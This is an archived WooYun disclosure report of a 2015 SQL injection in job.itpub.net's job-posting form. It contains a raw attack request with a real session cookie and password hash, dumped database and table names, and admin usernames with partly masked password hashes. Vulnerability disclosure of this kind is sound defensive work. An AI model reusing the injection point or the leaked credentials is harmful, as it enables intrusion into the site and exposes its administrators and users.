乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 细节已通知厂商并且等待厂商处理中 2015-09-17: 厂商已经确认,细节仅向厂商公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
RT
站点:http://job.itpub.net测试注入:
POST /enterprise/newjobs.php?comm=update HTTP/1.1Host: job.itpub.netProxy-Connection: keep-aliveContent-Length: 257Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://job.itpub.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://job.itpub.net/enterprise/newjobs.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: vjuids=-1675f8de4.14fd580b9a6.0.32960f1f; __utmt=1; __gads=ID=3f1254c47b3ee5b6:T=1442396137:S=ALNI_MaXyOscFH0jDn4HoxYAWILefwIgcg; __utma=122732244.1447527647.1442396060.1442396060.1442396060.1; __utmb=122732244.10.10.1442396060; __utmc=122732244; __utmz=122732244.1442396060.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_5016281862f595e78ffa42f085ea0f49=1442396061; Hm_lpvt_5016281862f595e78ffa42f085ea0f49=1442396219; pgv_pvi=104751498; pgv_info=ssi=s1215136893; euid=2602; euname=qingyou; eupass=14e1b600b1fd579f47433b88e8d85291; vjlast=1442396027.1442396027.30; __pta=2131536967.1442395998.1442396586.1442396588.48; __pts=559924916; __ptb=559924916hdnTodo=save&jobtitle=323&jobtype=%BC%E6%D6%B0&position=%CA%D7%CF%AF%BC%BC%CA%F5%D6%B4%D0%D0%B9%D9&daynum=30&headcount=0&salary=0&state=%C9%CF%BA%A3&city=%C9%CF%BA%A3&reqwyear=255°ree=255&info=4324&rdoJobCcType=1&email=123456%40qq.com&Submit=%B1%A3%B4%E6
数据库:
available databases [11]:[*] cuda[*] information_schema[*] ipflux[*] ipfluxblog[*] itblog_yii[*] job[*] plog[*] pub_it[*] pub_it_dx2[*] pub_it_xs[*] test
当前用户:
current user: '[email protected].%.%'
cuda数据库:
[233 tables]+------------------------------------+| pre_b10j_cache || pre_b10j_post || pre_common_addon || pre_common_admincp_cmenu || pre_common_admincp_group || pre_common_admincp_member || pre_common_admincp_perm || pre_common_admincp_session || pre_common_admingroup || pre_common_adminnote || pre_common_advertisement || pre_common_advertisement_custom || pre_common_banned || pre_common_block || pre_common_block_favorite || pre_common_block_item || pre_common_block_item_data || pre_common_block_permission || pre_common_block_pic || pre_common_block_style || pre_common_block_xml || pre_common_cache || pre_common_card || pre_common_card_log || pre_common_card_type || pre_common_credit_log || pre_common_credit_rule || pre_common_credit_rule_log || pre_common_credit_rule_log_field || pre_common_cron || pre_common_district || pre_common_diy_data || pre_common_domain || pre_common_failedlogin || pre_common_friendlink || pre_common_grouppm || pre_common_invite || pre_common_magic || pre_common_magiclog || pre_common_mailcron || pre_common_mailqueue || pre_common_member || pre_common_member_action_log || pre_common_member_connect || pre_common_member_count || pre_common_member_field_forum || pre_common_member_field_home || pre_common_member_grouppm || pre_common_member_log || pre_common_member_magic || pre_common_member_profile || pre_common_member_profile_setting || pre_common_member_security || pre_common_member_stat_field || pre_common_member_stat_fieldcache || pre_common_member_stat_search || pre_common_member_stat_searchcache || pre_common_member_status || pre_common_member_validate || pre_common_member_verify || pre_common_member_verify_info || pre_common_moderate || pre_common_myapp || pre_common_myinvite || pre_common_mytask || pre_common_nav || pre_common_onlinetime || pre_common_plugin || pre_common_pluginvar || pre_common_process || pre_common_regip || pre_common_relatedlink || pre_common_report || pre_common_searchindex || pre_common_secquestion || pre_common_session || pre_common_setting || pre_common_smiley || pre_common_sphinxcounter || pre_common_stat || pre_common_statuser || pre_common_style || pre_common_stylevar || pre_common_syscache || pre_common_tag || pre_common_tagitem || pre_common_task || pre_common_taskvar || pre_common_template || pre_common_template_block || pre_common_template_permission || pre_common_uin_black || pre_common_usergroup || pre_common_usergroup_field || pre_common_word || pre_common_word_type || pre_connect_feedlog || pre_connect_memberbindlog || pre_connect_tlog || pre_dsu_paulsign || pre_dsu_paulsignset || pre_extra_cuda_addlog || pre_extra_cuda_creditslog || pre_extra_cuda_soft || pre_forum_access || pre_forum_activity || pre_forum_activityapply || pre_forum_announcement || pre_forum_attachment || pre_forum_attachment_0 || pre_forum_attachment_1 || pre_forum_attachment_2 || pre_forum_attachment_3 || pre_forum_attachment_4 || pre_forum_attachment_5 || pre_forum_attachment_6 || pre_forum_attachment_7 || pre_forum_attachment_8 || pre_forum_attachment_9 || pre_forum_attachment_unused || pre_forum_attachtype || pre_forum_bbcode || pre_forum_creditslog || pre_forum_debate || pre_forum_debatepost || pre_forum_faq || pre_forum_forum || pre_forum_forum_threadtable || pre_forum_forumfield || pre_forum_forumrecommend || pre_forum_groupcreditslog || pre_forum_groupfield || pre_forum_groupinvite || pre_forum_grouplevel || pre_forum_groupranking || pre_forum_groupuser || pre_forum_imagetype || pre_forum_medal || pre_forum_medallog || pre_forum_memberrecommend || pre_forum_moderator || pre_forum_modwork || pre_forum_onlinelist || pre_forum_order || pre_forum_poll || pre_forum_polloption || pre_forum_pollvoter || pre_forum_post || pre_forum_post_location || pre_forum_post_tableid || pre_forum_postcomment || pre_forum_postlog || pre_forum_postposition || pre_forum_poststick || pre_forum_promotion || pre_forum_ratelog || pre_forum_relatedthread || pre_forum_replycredit || pre_forum_rsscache || pre_forum_spacecache || pre_forum_statlog || pre_forum_thread || pre_forum_threadclass || pre_forum_threadimage || pre_forum_threadlog || pre_forum_threadmod || pre_forum_threadpartake || pre_forum_threadrush || pre_forum_threadtype || pre_forum_trade || pre_forum_tradecomment || pre_forum_tradelog || pre_forum_typeoption || pre_forum_typeoptionvar || pre_forum_typevar || pre_forum_warning || pre_home_album || pre_home_album_category || pre_home_appcreditlog || pre_home_blacklist || pre_home_blog || pre_home_blog_category || pre_home_blogfield || pre_home_class || pre_home_click || pre_home_clickuser || pre_home_comment || pre_home_docomment || pre_home_doing || pre_home_favorite || pre_home_feed || pre_home_feed_app || pre_home_friend || pre_home_friend_request || pre_home_friendlog || pre_home_notification || pre_home_pic || pre_home_picfield || pre_home_poke || pre_home_pokearchive || pre_home_share || pre_home_show || pre_home_specialuser || pre_home_userapp || pre_home_userappfield || pre_home_visitor || pre_phpcome_gift_address || pre_phpcome_gift_comment || pre_phpcome_gift_goods || pre_phpcome_gift_group || pre_phpcome_gift_info || pre_phpcome_gift_order || pre_portal_article_content || pre_portal_article_count || pre_portal_article_related || pre_portal_article_title || pre_portal_article_trash || pre_portal_attachment || pre_portal_category || pre_portal_category_permission || pre_portal_comment || pre_portal_rsscache || pre_portal_topic || pre_portal_topic_pic || pre_tools_censorhome || pre_tools_rule || pre_xwb_bind_info || pre_xwb_bind_thread || pre_xwb_session || pre_zywx_forum_postfield || pre_zywx_home_blogfield || pre_zywx_useroperation || pre_zywx_useroperation_log |+------------------------------------+
后台密码(神器的马赛克):
+-------------+------------------------------------------+| username | password |+-------------+------------------------------------------+| gaohongfeng | AAAAAAAAAAAAfb4f40c36b74afe841aa || gaoyang | AAAAAAAAAAAA3857086116d7099885ee || admin | AAAAAAAAAAAAa6ed8b372722bf595953 || tangchuan | AAAAAAAAAAAA0c908810c06ab1ff3967 || tc | AAAAAAAAAAAA0c908810c06ab1ff3967 |+-------------+------------------------------------------+
招聘资料:
企业资料:
虽然你们忽略我的洞了
危害等级:高
漏洞Rank:18
确认时间:2015-09-17 10:48
多谢
暂无
